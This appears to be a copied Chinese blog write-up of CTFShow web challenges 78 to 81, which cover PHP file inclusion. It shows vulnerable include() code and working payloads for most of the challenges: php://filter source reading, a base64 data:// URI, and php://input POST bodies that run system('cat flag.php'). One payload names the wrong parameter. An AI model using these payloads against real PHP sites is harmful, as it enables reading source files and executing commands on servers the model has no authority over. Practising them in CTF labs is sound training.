CTFShow-Web入门-文件包含 78-

时间：2020-10-30 22:27:58 阅读：97 评论：0 收藏：0 [点我收藏+]

web78

if(isset($_GET[‘file‘])){
    $file = $_GET[‘file‘];
    include($file);
}else{
    highlight_file(__FILE__);
}

使用 include进行了文件包含

payload：?filter=php://filter/convert.base64-encode/resource=flag.php

web79

if(isset($_GET[‘file‘])){
    $file = $_GET[‘file‘];
    $file = str_replace("php", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}

替换了 php

payload：?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs=

(PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs= 为 <?php system(‘cat flag.php‘);

web80

if(isset($_GET[‘file‘])){
    $file = $_GET[‘file‘];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}

替换了 data

payload：?file=Php://

POST：<?php system(‘cat fl*‘);?

这里用hackbar无法传入，可以用burpsuite

web81

if(isset($_GET[‘file‘])){
    $file = $_GET[‘file‘];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    $file = str_replace(":", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}

: 被替换

CTFShow-Web入门-文件包含 78-

原文：https://www.cnblogs.com/yanwusheng/p/13902116.html

踩

(0)

评论一句话评论（0）

分享档案

更多>

2021年09月23日 (328)
2021年09月24日 (313)
2021年09月17日 (191)
2021年09月15日 (369)
2021年09月16日 (411)
2021年09月13日 (439)
2021年09月11日 (398)
2021年09月12日 (393)
2021年09月10日 (160)
2021年09月08日 (222)